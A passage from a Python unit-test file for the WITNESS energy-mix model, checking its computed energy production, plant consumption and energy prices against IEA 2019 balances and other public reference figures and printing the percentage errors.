# we compare in Mt and must be near 10% of error
print(
f'Total CO2 emissions : ourworldindata {total_co2_emissions} Mt vs WITNESS {computed_total_co2_emissions} Mt')
self.assertLessEqual(computed_total_co2_emissions,
total_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_total_co2_emissions, total_co2_emissions * 0.9)
def test_03_check_net_production_values(self):
'''
Test order of magnitude of net energy production with values from Energy Balances IEA 2019:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# Detailed raw and net energy productions by energy (columns expressed in TWh)
net_energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_detailed')
energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
'''
Theory in 2019 from Energy Balances IEA 2019 expressed in TWh
'''
'''
Coal balances
'''
print('---------- Coal balances -------------')
coal_energy_own_use = 952.78
print(
f'Energy own use for coal production is {coal_energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_coal_iea = 46666 - coal_energy_own_use # TWH
coal_raw_prod = energy_production['production solid_fuel (TWh)'][0]
error_coalraw_prod = np.abs(
energy_production_raw_coal_iea - coal_raw_prod) / energy_production_raw_coal_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal raw production error : ', error_coalraw_prod, ' %',
f'IEA :{energy_production_raw_coal_iea} TWh vs WITNESS :{coal_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
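# The energy_consumption dataframes appear to be expressed in PWh, hence the factor 1000.0 to obtain TWh for the IEA comparison.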
elec_plants_coal_IEA = 20194.44 # TWh
error_elec_plants = np.abs(
elec_plants_coal_IEA - elec_plants) / elec_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
self.assertLessEqual(error_elec_plants,
10.0)
print('coal used by electricity plants error : ', error_elec_plants, ' %',
f'IEA :{elec_plants_coal_IEA} TWh vs WITNESS :{elec_plants} TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
liquefaction_plants_coal_IEA = 264.72 # TWh
error_syngas_plants = np.abs(
liquefaction_plants_coal_IEA - syngas_plants) / liquefaction_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('coal used by syngas plants error : ', error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_coal_IEA} TWh vs WITNESS :{syngas_plants} TWh')
coal_used_by_energy = energy_production[
'production solid_fuel (TWh)'][0] - net_energy_production[
'production solid_fuel (TWh)'][0]
# CHP plants and heat plants technology not implemented
chp_plants = 8222.22 + 289 # TWh
print('CHP and heat plants not implemented correspond to ',
chp_plants / coal_used_by_energy * 100.0, ' % of coal used by energy : ', chp_plants, ' TWh')
# coal to gas technology not implemented
gas_works = 196.11  # TWh
print('Coal to gas plants not implemented correspond to ',
gas_works / coal_used_by_energy * 100.0, ' % of coal used by energy')
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
coal_total_final_consumption_iea = 11055 # TWH
error_coalnet_prod = np.abs(
coal_total_final_consumption_iea - coal_total_final_consumption) / coal_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal net production error : ', error_coalnet_prod, ' %',
f'IEA :{coal_total_final_consumption_iea} TWh vs WITNESS :{coal_total_final_consumption} TWh')
print('The fact that CHP and heat plants are not taken into account for coal consumption explains the differences')
'''
Gas balances
'''
print('---------- Gas balances -------------')
energy_own_use = 3732.83
print('Energy industry own use covers the amount of fuels used by the energy producing industries (e.g. for heating, lighting and operation of all equipment used in the extraction process, for traction and for distribution)')
print(
f'Energy own use for methane production is {energy_own_use} TWh and now taken into account into raw production')
energy_production_raw_gas_iea = 40000 - energy_own_use # TWH
gas_raw_prod = energy_production['production methane (TWh)'][0]
error_gasraw_prod = np.abs(
energy_production_raw_gas_iea - gas_raw_prod) / energy_production_raw_gas_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('gas raw production error : ', error_gasraw_prod, ' %',
f'IEA :{energy_production_raw_gas_iea} TWh vs WITNESS :{gas_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'methane (TWh)'][0] * 1000.0
elec_plants_gas_IEA = 10833.33 # TWh
chp_plants_iea = 3887.05 + 709 # TWh
error_elec_plants = np.abs(
elec_plants_gas_IEA - elec_plants) / elec_plants_gas_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_elec_plants,
# 10.0)
print('gas used by electricity plants error : ',
error_elec_plants, ' %',
f'IEA :{elec_plants_gas_IEA } TWh vs WITNESS :{elec_plants} TWh')
methane_used_by_energy = energy_production[
'production methane (TWh)'][0] - net_energy_production[
'production methane (TWh)'][0]
print('CHP and heat plants not implemented correspond to ',
chp_plants_iea / methane_used_by_energy * 100.0, ' % of methane used by energy : ', chp_plants_iea, ' TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'methane (TWh)'][0] * 1000.0
liquefaction_plants_methane_IEA = 202.74 # TWh
other_transformation = 277.5 # TWH
# other transformation includes the transformation of natural gas for
# hydrogen manufacture
error_syngas_plants = np.abs(
liquefaction_plants_methane_IEA + other_transformation - syngas_plants) / liquefaction_plants_methane_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('methane used by syngas plants error : ',
error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_methane_IEA + other_transformation} TWh vs WITNESS :{syngas_plants} TWh')
methane_total_final_consumption = net_energy_production[
'production methane (TWh)'][0]
methane_total_final_consumption_iea = 19001 # TWH
error_methanenet_prod = np.abs(
methane_total_final_consumption_iea - methane_total_final_consumption) / methane_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('methane net production error : ', error_methanenet_prod, ' %',
f'IEA :{methane_total_final_consumption_iea} TWh vs WITNESS :{methane_total_final_consumption} TWh')
print('The fact that CHP and heat plants are not taken into account for methane consumption explains some of the differences')
'''
Electricity balances
'''
print('---------- Electricity balances -------------')
net_elec_prod = net_energy_production[
'production electricity (TWh)'][0]
net_elec_prod_iea = 22847.66 # TWh
error_net_elec_prod = np.abs(
net_elec_prod_iea - net_elec_prod) / net_elec_prod_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('Net electricity production error : ', error_net_elec_prod, ' %',
f'IEA :{net_elec_prod_iea} TWh vs WITNESS :{net_elec_prod} TWh')
energy_production_raw_hydro_iea = 4222.22 # TWH
elec_hydropower_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
elec_hydropower_prod['years'] == 2020].values[0] * 1000
error_hydropowerraw_prod = np.abs(
energy_production_raw_hydro_iea - computed_hydropower_production) / energy_production_raw_hydro_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('hydropower raw production error : ', error_hydropowerraw_prod, ' %',
f'IEA :{energy_production_raw_hydro_iea} TWh vs WITNESS :{computed_hydropower_production} TWh')
energy_production_raw_wind_iea = 1427.41 # TWH
elec_windonshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
elec_windoffshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
elec_windoffshore_prod['electricity (TWh)'].loc[
elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
error_wind_prod = np.abs(
energy_production_raw_wind_iea - computed_wind_production) / energy_production_raw_wind_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_wind_prod,
# 10.0)
print('Wind raw production error : ', error_wind_prod, ' %',
f'IEA :{energy_production_raw_wind_iea} TWh vs WITNESS :{computed_wind_production} TWh')
elec_solar_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
computed_solarpv_production = elec_solar_prod['electricity (TWh)'].loc[
elec_solar_prod['years'] == 2020].values[0] * 1000
energy_production_solarpv_iea = 680.9 # TWh
error_solarpv_prod = np.abs(
energy_production_solarpv_iea - computed_solarpv_production) / energy_production_solarpv_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar PV raw production error : ', error_solarpv_prod, ' %',
f'IEA :{energy_production_solarpv_iea} TWh vs WITNESS :{computed_solarpv_production} TWh')
elec_solarth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
computed_solarth_production = elec_solarth_prod['electricity (TWh)'].loc[
elec_solarth_prod['years'] == 2020].values[0] * 1000
energy_production_solarth_iea = 13.36 # TWh
error_solarth_prod = np.abs(
energy_production_solarth_iea - computed_solarth_production) / energy_production_solarth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar Thermal raw production error : ', error_solarth_prod, ' %',
f'IEA :{energy_production_solarth_iea} TWh vs WITNESS :{computed_solarth_production} TWh')
elec_geoth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Geothermal.techno_production')
computed_geoth_production = elec_geoth_prod['electricity (TWh)'].loc[
elec_geoth_prod['years'] == 2020].values[0] * 1000.0
energy_production_geoth_iea = 91.09 # TWh
error_geoth_prod = np.abs(
energy_production_geoth_iea - computed_geoth_production) / energy_production_geoth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Geothermal raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_geoth_iea} TWh vs WITNESS :{computed_geoth_production} TWh')
elec_coalgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_production')
computed_coalgen_production = elec_coalgen_prod['electricity (TWh)'].loc[
elec_coalgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_coalgen_iea = 9914.45 # TWh
error_coalgen_prod = np.abs(
energy_production_coalgen_iea - computed_coalgen_production) / energy_production_coalgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalgen_prod,
# 10.0)
print('Coal generation raw production error : ', error_coalgen_prod, ' %',
f'IEA :{energy_production_coalgen_iea} TWh vs WITNESS :{computed_coalgen_production} TWh')
elec_oilgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.OilGen.techno_production')
computed_oilgen_production = elec_oilgen_prod['electricity (TWh)'].loc[
elec_oilgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_oilgen_iea = 747 # TWh
error_oil_prod = np.abs(
energy_production_oilgen_iea - computed_oilgen_production) / energy_production_oilgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Oil generation raw production error : ', error_oil_prod, ' %',
f'IEA :{energy_production_oilgen_iea} TWh vs WITNESS :{computed_oilgen_production} TWh')
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_production')
computed_gasgen_production = elec_gt_prod['electricity (TWh)'].loc[
elec_gt_prod['years'] == 2020].values[0] * 1000.0 + elec_cgt_prod['electricity (TWh)'].loc[
elec_cgt_prod['years'] == 2020].values[0] * 1000.0
energy_production_gasgen_iea = 6346 # TWh
error_gasgen_prod = np.abs(
energy_production_gasgen_iea - computed_gasgen_production) / energy_production_gasgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Gas generation raw production error : ', error_gasgen_prod, ' %',
f'IEA :{energy_production_gasgen_iea} TWh vs WITNESS :{computed_gasgen_production} TWh')
elec_nuclear_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
energy_production_nuclear_iea = 2789.69 # TWh
error_nuclear_prod = np.abs(
energy_production_nuclear_iea - computed_nuclear_production) / energy_production_nuclear_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_nuclear_prod,
# 10.0)
print('Nuclear raw production error : ', error_nuclear_prod, ' %',
f'IEA :{energy_production_nuclear_iea} TWh vs WITNESS :{computed_nuclear_production} TWh')
energy_production_oilgen_iea = 747 # TWh
energy_production_biofuelgen_iea = 542.56 # TWh
print(
f'Technologies of electricity generation with oil ({energy_production_oilgen_iea} TWh) and biofuel ({energy_production_biofuelgen_iea} TWh) are not yet implemented')
'''
Biofuels and waste balances
'''
print('---------- Biomass dry balances -------------')
print('We consider biomass_dry equal to the sum of primary solid biofuels (no municipal/industrial waste) but in the doc they do not consider crop residues')
biomass_dry_raw_prod_iea = (
48309940) / 3600  # TWh (excluded waste terms: 1414648 + 1142420 TJ)
biomass_dry_net_prod_iea = (36537355) / 3600  # TWh (excluded waste terms: 150882 + 519300 TJ)
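# IEA biomass values are given in TJ; dividing by 3600 converts them to TWh (1 TWh = 3600 TJ).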
# managed_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.ManagedWood.techno_production')
#
# computed_managed_wood_prod = managed_wood_prod['biomass_dry (TWh)'].loc[
# managed_wood_prod['years'] == 2020].values[0] * 1000.0
#
# unmanaged_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.UnmanagedWood.techno_production')
#
# computed_unmanaged_wood_prod = unmanaged_wood_prod['biomass_dry (TWh)'].loc[
# unmanaged_wood_prod['years'] == 2020].values[0] * 1000.0
#
# crop_energy_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.CropEnergy.techno_production')
#
# computed_crop_energy_prod = crop_energy_prod['biomass_dry (TWh)'].loc[
# crop_energy_prod['years'] == 2020].values[0] * 1000.0
#
biomass_dry_net_prod = net_energy_production[
'production biomass_dry (TWh)'][0] # - computed_crop_energy_prod
#
biomass_dry_raw_prod = energy_production[
'production biomass_dry (TWh)'][0]
error_biomassdry_raw_prod = np.abs(
biomass_dry_raw_prod_iea - biomass_dry_raw_prod) / biomass_dry_raw_prod_iea * 100.0
print('Biomass dry raw production error : ', error_biomassdry_raw_prod, ' %',
f'IEA :{biomass_dry_raw_prod_iea} TWh vs WITNESS :{biomass_dry_raw_prod} TWh')
error_biomassdry_net_prod = np.abs(
biomass_dry_net_prod_iea - biomass_dry_net_prod) / biomass_dry_net_prod_iea * 100.0
print('Biomass dry net production error : ', error_biomassdry_net_prod, ' %',
f'IEA :{biomass_dry_net_prod_iea} TWh vs WITNESS :{biomass_dry_net_prod} TWh')
#
# biomass_dry_elec_plants = 3650996 / 3600 # TWh
# biomass_dry_chp_plants = (2226110 + 324143) / 3600 # TWh
# biomass_dry_otherrtransf = 5220384 / 3600 # TWh
#
# print('CHP and heat plants using biomass are not implemented corresponds to ',
# biomass_dry_chp_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_chp_plants, ' TWh')
# print('Electricity plants using biomass are not implemented corresponds to ',
# biomass_dry_elec_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_elec_plants, ' TWh')
#
# biogas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biogas.energy_consumption')
#
# biomass_by_biogas_cons = biogas_cons['wet_biomass (Mt)'].loc[
# biogas_cons['years'] == 2020].values[0] * 1000 * 3.6 # 3.6 is calorific value of biomass_dry
#
# syngas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_syngas_cons = syngas_cons['biomass_dry (TWh)'].loc[
# syngas_cons['years'] == 2020].values[0] * 1000
#
# solid_fuel_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_solid_fuel_cons = solid_fuel_cons['biomass_dry (TWh)'].loc[
# solid_fuel_cons['years'] == 2020].values[0] * 1000
#
# biomass_dry_otherrtransf_witness = biomass_by_solid_fuel_cons + biomass_by_syngas_cons
# biomass_dry_otherrtransf_with_ana = biomass_by_biogas_cons + \
# biomass_dry_otherrtransf_witness
#
# error_biomassdry_otherrtransf_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_witness) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation production error : ', error_biomassdry_otherrtransf_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS :{biomass_dry_otherrtransf_witness} TWh')
#
# error_biomassdry_otherrtransf_with_ana_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_with_ana) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation (adding anaerobic digestion) production error : ', error_biomassdry_otherrtransf_with_ana_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS with anaerobic
# digestion :{biomass_dry_otherrtransf_with_ana} TWh')
print('---------- liquid biofuels balances -------------')
print('IEA biofuels include bioethanol (ethanol produced from biomass), biomethanol (methanol produced from biomass), bioETBE (ethyl-tertio-butyl-ether produced on the basis of bioethanol) and bioMTBE (methyl-tertio-butyl-ether produced on the basis of biomethanol)')
print('and biodiesel (a methyl-ester produced from vegetable or animal oil, of diesel quality), biodimethylether (dimethylether produced from biomass), Fischer Tropsch (Fischer Tropsch produced from biomass), cold pressed bio-oil (oil produced from oil seed through mechanical processing only) ')
raw_biodiesel_prod = energy_production[
'production fuel.biodiesel (TWh)'][0]
raw_hydrotreated_oil_fuel_prod = energy_production[
'production fuel.hydrotreated_oil_fuel (TWh)'][0]
raw_liquid_fuel = raw_biodiesel_prod + \
raw_hydrotreated_oil_fuel_prod
liquidbiofuels_raw_prod_iea = 131224 * 1e6 * 11.9 / 1e9  # 131 224 kt at 11.9 kWh/kg, converted to TWh
error_liquid_fuel_raw_prod = np.abs(
liquidbiofuels_raw_prod_iea - raw_liquid_fuel) / liquidbiofuels_raw_prod_iea * 100.0
print('Liquid fuels raw production error : ', error_liquid_fuel_raw_prod, ' %',
f'IEA :{liquidbiofuels_raw_prod_iea} TWh vs WITNESS :{raw_liquid_fuel} TWh')
print(
'Many biofuels are not implemented (no details of specific biofuel productions)')
print('---------- Biogases balances -------------')
print('In IEA, biogas are mainly gases from the anaerobic digestion but also can be produced from thermal processes (pyrolysis) or from syngas')
print('WITNESS model considers only anaerobic digestion')
raw_biogas_prod = energy_production[
'production biogas (TWh)'][0]
biogas_raw_prod_iea = 1434008 / 3600
error_biogas_raw_prod = np.abs(
biogas_raw_prod_iea - raw_biogas_prod) / biogas_raw_prod_iea * 100.0
print('Biogas raw production error : ', error_biogas_raw_prod, ' %',
f'IEA :{biogas_raw_prod_iea} TWh vs WITNESS :{raw_biogas_prod} TWh')
print(
f'Biogas is used in energy industry mainly for electricity plants {448717/3600} TWh and CHP plants {385127/3600} TWh')
print('These technologies are not yet implemented in WITNESS models, then :')
biogas_net_prod_iea = 521188 / 3600
net_biogas_prod = net_energy_production[
'production biogas (TWh)'][0]
error_biogas_net_prod = np.abs(
biogas_net_prod_iea - net_biogas_prod) / biogas_net_prod_iea * 100.0
print('Biogas net production error : ', error_biogas_net_prod, ' %',
f'IEA :{biogas_net_prod_iea} TWh vs WITNESS :{net_biogas_prod} TWh')
'''
Oil balances
'''
print('---------- Oil balances -------------')
iea_data_oil = {'kerosene': (14082582 + 2176724) / 3600,
# gasoline + diesel
'gasoline': (41878252 + 56524612) / 3600,
#'diesel': 56524612 / 3600,
#'naphtas' :11916946/3600,
'heating_oil': 16475667 / 3600, # equivalent to fuel oil
#'other_oil_products' :25409482/3600,
'liquefied_petroleum_gas': 5672984 / 3600, # LPG/ethane
'fuel.liquid_fuel': 190442343 / 3600 # total of crude oil
}
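# IEA oil product values above are in TJ and divided by 3600 to obtain TWh; gasoline and diesel are lumped together under 'gasoline' to match the WITNESS refinery outputs.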
raw_refinery_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.fuel.liquid_fuel.Refinery.techno_production')
raw_refinery_prod_2020 = raw_refinery_prod.loc[
raw_refinery_prod['years'] == 2020] * 1000.0
for oil_name, oil_prod in iea_data_oil.items():
oil_prod_witness = raw_refinery_prod_2020[
f'{oil_name} (TWh)'].values[0]
error_oil_prod = np.abs(
oil_prod - oil_prod_witness) / oil_prod * 100.0
print(f'{oil_name} raw production error : ', error_oil_prod, ' %',
f'IEA :{oil_prod} TWh vs WITNESS :{oil_prod_witness} TWh')
print(
'WITNESS model only takes for now raw liquid_fuel production which is correct')
net_liquid_fuel_prod = net_energy_production[
'production fuel.liquid_fuel (TWh)'][0]
liquid_fuel_net_prod_iea = 168375005 / 3600
error_liquid_fuel_net_prod = np.abs(
liquid_fuel_net_prod_iea - net_liquid_fuel_prod) / liquid_fuel_net_prod_iea * 100.0
print('Liquid fuel net production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{liquid_fuel_net_prod_iea} TWh vs WITNESS :{net_liquid_fuel_prod} TWh')
liquid_fuel_own_use = 2485.89 # TWH
liquid_fuel_raw_prod = raw_refinery_prod_2020[
f'fuel.liquid_fuel (TWh)'].values[0]
energy_production_raw_liquidfuel_iea = 52900 - liquid_fuel_own_use
print(
f'Energy own use for liquid fuel production is {liquid_fuel_own_use} TWh')
error_liquid_fuel_raw_prod = np.abs(
energy_production_raw_liquidfuel_iea - liquid_fuel_raw_prod) / energy_production_raw_liquidfuel_iea * 100.0
print('Liquid fuel raw production error : ', error_liquid_fuel_raw_prod, ' %',
f'IEA :{energy_production_raw_liquidfuel_iea} TWh vs WITNESS :{liquid_fuel_raw_prod} TWh')
chp_plants = 159.62 + 99.81 # TWh
print('CHP and heat plants not implemented correspond to ',
chp_plants / liquid_fuel_raw_prod * 100.0, ' % of total raw liquid fuel production : ', chp_plants, ' TWh')
oil_elec_plants = 1591.67 # TWh
# elec plants needs
elec_plants_oil = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'fuel.liquid_fuel (TWh)'][0] * 1000.0
error_oil_cons = np.abs(
oil_elec_plants - elec_plants_oil) / oil_elec_plants * 100.0
print('Liquid fuel consumption from elec error : ', error_oil_cons, ' %',
f'IEA :{oil_elec_plants} TWh vs WITNESS :{elec_plants_oil} TWh')
print('----------------- Total production -------------------')
total_raw_prod_iea = 173340 # TWh
total_raw_prod = energy_production['Total production'][0]
error_total_raw_prod = np.abs(
total_raw_prod_iea - total_raw_prod) / total_raw_prod_iea * 100.0
print('Total raw production error : ', error_total_raw_prod, ' %',
f'IEA :{total_raw_prod_iea} TWh vs WITNESS :{total_raw_prod} TWh')
total_net_prod_iea = 116103 # TWh
total_net_prod = net_energy_production['Total production'][0]
error_total_net_prod = np.abs(
total_net_prod_iea - total_net_prod) / total_net_prod_iea * 100.0
print('Total net production error : ', error_total_net_prod, ' %',
f'IEA :{total_net_prod_iea} TWh vs WITNESS :{total_net_prod} TWh')
def test_04_check_prices_values(self):
'''
Test order of magnitude of prices
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# Energy prices are expressed in $/MWh
energy_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices')
energy_prices_after_tax = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices_after_tax')
'''
Energy prices
'''
print('Comparison of prices coming from globalpetrolprices.com')
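# Reference prices below are converted from their native units ($/L, $/m3, $/kg, $/t, $/mbtu) to $/MWh using
# approximate densities and calorific values; the exact conversion factors are assumptions of this test.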
elec_price_iea = 137 # $/MWh
elec_price = energy_prices[
'electricity'][0]
error_elec_price = np.abs(
elec_price_iea - elec_price) / elec_price_iea * 100.0
print('Electricity price error in 2021: ', error_elec_price, ' %',
f'globalpetrolprices.com :{elec_price_iea} $/MWh vs WITNESS :{elec_price} $/MWh')
ng_price_iea_2022 = 1.17 / 0.657e-3 / 13.9 # $/MWh
ng_price_iea_2021 = 0.8 / 0.657e-3 / 13.9 # $/MWh
ng_price = energy_prices[
'methane'][0]
error_ng_price = np.abs(
ng_price_iea_2021 - ng_price) / ng_price_iea_2021 * 100.0
print('Natural Gas/Methane price error in 2021 : ', error_ng_price, ' %',
f'globalpetrolprices.com :{ng_price_iea_2021} $/MWh vs WITNESS :{ng_price} $/MWh')
kerosene_price_iea = 0.92 / 0.0095 # $/MWh in 2022
kerosene_price_iea_2021 = 2.8 / 39.5 * 1000 # $/MWh in 2021
kerosene_price = energy_prices[
'fuel.liquid_fuel'][0]
error_kerosene_price = np.abs(
kerosene_price_iea_2021 - kerosene_price) / kerosene_price_iea_2021 * 100.0
print('kerosene price error in 2021 : ', error_kerosene_price, ' %',
f'globalpetrolprices.com :{kerosene_price_iea_2021} $/MWh vs WITNESS :{kerosene_price} $/MWh')
print('hydrogen prices details have been found on IEA website :https://www.iea.org/data-and-statistics/charts/global-average-levelised-cost-of-hydrogen-production-by-energy-source-and-technology-2019-and-2050 ')
hydrogen_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.energy_detailed_techno_prices')
smr_price_iea = 1.6 / 33.3 * 1000  # between 0.7 and 1.6 $/kg (upper bound used), with 33.3 kWh/kg of hydrogen
# between 1.9 and 2.5 $/kg mean : 2.2 $/kg
coal_gas_price_iea = 2.5 / 33.3 * 1000
wgs_price = hydrogen_prices[
'WaterGasShift'][0]
wgs_price_iea = 0.75 * smr_price_iea + 0.25 * coal_gas_price_iea
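# The WaterGasShift reference price is a 75% SMR / 25% coal gasification mix, consistent with the flue-gas split used in test_02.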
error_wgs_price = np.abs(
wgs_price_iea - wgs_price) / wgs_price_iea * 100.0
print('Hydrogen price by watergas shift (coal and gas) error in 2021: ', error_wgs_price, ' %',
f'IEA :{wgs_price_iea} $/MWh vs WITNESS :{wgs_price} $/MWh')
electrolysis_price_iea = 7.7 / 33.3 * 1000 # between 3.2 and 7.7 $/kg
electrolysis_price = hydrogen_prices[
'Electrolysis.SOEC'][0]
error_electrolysis_price = np.abs(
electrolysis_price_iea - electrolysis_price) / electrolysis_price_iea * 100.0
print('Hydrogen price by Electrolysis error in 2021: ', error_electrolysis_price, ' %',
f'IEA :{electrolysis_price_iea} $/MWh vs WITNESS :{electrolysis_price} $/MWh')
biogas_price_gazpack = 30 / 0.293 # 30 $/mbtu
biogas_price = energy_prices[
'biogas'][0]
error_biogas_price = np.abs(
biogas_price_gazpack - biogas_price) / biogas_price_gazpack * 100.0
print('Biogas price error in 2019: ', error_biogas_price, ' %',
f'gazpack.nl/ :{biogas_price_gazpack} $/MWh vs WITNESS :{biogas_price} $/MWh')
# between 50 and 100 $ /tonne
coal_price_ourworldindata = 50 * 1e-3 / 4.86 * 1e3
coal_price = energy_prices[
'solid_fuel'][0]
error_coal_price = np.abs(
coal_price_ourworldindata - coal_price) / coal_price_ourworldindata * 100.0
print('Coal price error in 2021: ', error_coal_price, ' %',
f'ourworldindata.com :{coal_price_ourworldindata} $/MWh vs WITNESS :{coal_price} $/MWh')
biodiesel_price_neste = 1500 / 10.42
biodiesel_price = energy_prices[
'fuel.biodiesel'][0]
error_biodiesel_price = np.abs(
biodiesel_price_neste - biodiesel_price) / biodiesel_price_neste * 100.0
print('Biodiesel price error in 2021: ', error_biodiesel_price, ' %',
f'neste.com :{biodiesel_price_neste} $/MWh vs WITNESS :{biodiesel_price} $/MWh')
biomass_price_statista = 35 / 3.6
biomass_price = energy_prices[
'biomass_dry'][0]
error_biomass_price = np.abs(
biomass_price_statista - biomass_price) / biomass_price_statista * 100.0
print('Biomass price error in 2021: ', error_biomass_price, ' %',
f'US statista.com :{biomass_price_statista} $/MWh vs WITNESS :{biomass_price} $/MWh')
hefa_price_iea = 1.2 / 780e-3 / 12.2 * 1000
hefa_price = energy_prices[
'fuel.hydrotreated_oil_fuel'][0]
error_hefa_price = np.abs(
hefa_price_iea - hefa_price) / hefa_price_iea * 100.0
print('HEFA price error in 2020: ', error_hefa_price, ' %',
f'IEA :{hefa_price_iea} $/MWh vs WITNESS :{hefa_price} $/MWh')
print('------------- Electricity prices --------------')
elec_detailed_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.energy_detailed_techno_prices')
elec_detailed_prices['Nuclear'].values[0]  # detailed per-technology electricity price checks are not implemented yet
if '__main__' == __name__:
t0 = time.time()
cls = TestGlobalEnergyValues()
cls.setUp()
cls.test_03_check_net_production_values()
print(f'Time : {time.time() - t0} s')
